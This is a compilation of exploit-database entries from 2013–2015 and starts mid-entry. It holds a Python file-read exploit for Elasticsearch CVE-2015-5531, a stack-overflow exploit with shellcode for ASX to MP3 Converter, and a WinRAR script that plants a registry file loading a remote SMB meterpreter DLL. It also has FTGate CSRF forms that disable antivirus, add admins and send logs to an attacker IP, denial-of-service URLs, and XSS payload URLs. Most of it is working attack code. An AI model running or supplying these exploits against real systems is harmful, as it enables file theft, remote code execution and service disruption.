There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
```
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
import urllib, urllib2, json, sys, re
print "!dSR script for CVE-2015-5531\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')
port = 9200
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)
def createSnapdirs():
try:
url = "%s/%s" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
url = "%s/%sie" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
except urllib2.HTTPError, e:
data = json.load(e)
print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
print str(data['error'])
sys.exit()
def grabFile(xplurl):
try:
urllib2.urlopen(xplurl)
except urllib2.HTTPError, e:
data = json.load(e)
extrdata = re.findall(r'\d+', str(data['error']))
decoder = bytearray()
for i in extrdata[+2:]:
decoder.append(int(i))
print decoder
def main():
createSnapdirs()
grabFile(xplurl)
if __name__ == "__main__":
main()
'''
# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
# Date: 2 Oct 2015
# Exploit Author: ex_ptr
# Vendor Homepage: http://mini-stream.net
# Version: 1.82.50
# Tested on: Windows XP SP3
'''
import struct
filename = "exploit.asx"
dummy = "A"*0x104
EIP = struct.pack('<I', 0x76af3adc)
FFFF = "\xFF\xFF\xFF\xFF"
NOP = "\x90"*4
Shell = ("\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
"\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
"\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
"\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
"\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
"\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
"\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
"\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
"\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
"\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")
exploit = dummy + EIP + FFFF + NOP + Shell
f = open(filename,'wb')
f.write(exploit)
f.close()
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys
# used by winrar, we can create a specially crafted settings file and we can
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","\\\\")
print "[+] Writing Contet To Settings.reg [+]"
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add arbitrary mailbox & disable antivirus,
5) remove email attachment blocking for filez.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable Antivirus for .exe files: also, has a persistent XSS inject but our
payload gets truncated at 5 chars,
but can corrupt the loading of valid XML returned from database to the WEB
UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
when access the above URL it returns XML with all file extensions blocked
on incoming email, we now know ID in database.
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
Vendor:
================================
www.ftgate.com
Product:
========================================
FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate 2009 that allow us to add
arbitrary remote domains,
disable antivirus scanning for various Email file attachment types, and
finally change settings
to have archived server logs sent to our remote attacker controlled server
for safe keeping.
Exploit code(s):
===============
CSRF(s):
<!DOCTYPE>
<html>
<body onLoad="invertedcross()">
<script>
function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}
</script>
1) add arbitrary domains:
-------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
method="post">
<input type="text" name="dname" value="hyp3rlinx.com" />
<input type="text" name="dtype" value="4" />
<input type="text" name="fname" value="*" />
<input type="text" name="action" value="domadd" />
<input type="text" name="domain" value="" />
<input type="text" name="newdomain" value="" />
</form>
2) sends archived logs to arbitrary remote server:
--------------------------------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="enable" value="on" />
<input type="text" name="path"
value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="6.6.6.0" />
</form>
3) disable virus scan for .jar or .exe files etc:
-------------------------------------------------
Options to control handling of virus scanning for email attachments Virus
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/filters/virus.fts" method="post">
<input type="text" name="action" value="add" />
<input type="text" name="mode" value="0" />
<input type="text" name="extension" value="dll" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode
####################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
Vendor:
================================
www.ftgate.com
Product:
================================
FTGate 2009 SR3 May 13 2010 Build 6.4.000
Vulnerability Type:
=======================
Denial of service (DOS)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple denial of service oppurtunities reside within FTGate 2009 that
allow us to disrupt and shut down
various FTGate services via GET requests by luring victimz to our website
or get them to click our malicious linxs.
Exploit code(s):
===============
DOS:
1) shutdown solight web mail interface on port 80
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
2) shutdown Monitor server port 8081
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
3) shutdown FTGate connector server port 8090 listens on address 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
4) shutdown IMAP server port 143 listening on 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.000
Vulnerable Parameter(s): [+] action, id
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/58425/info
Privoxy is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
Privoxy 3.0.20 is affected; other versions may also be vulnerable.
Response Code (current).: 407
Response Headers (as seen by your browser).:
HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Request Headers (as seen by the remote website)
Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive
source: https://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
source: https://www.securityfocus.com/bid/58418/info
Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/public/error.php?warning=<XSS injection>
source: https://www.securityfocus.com/bid/58417/info
SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Content spoofing:
http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
Cross-site scripting:
http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E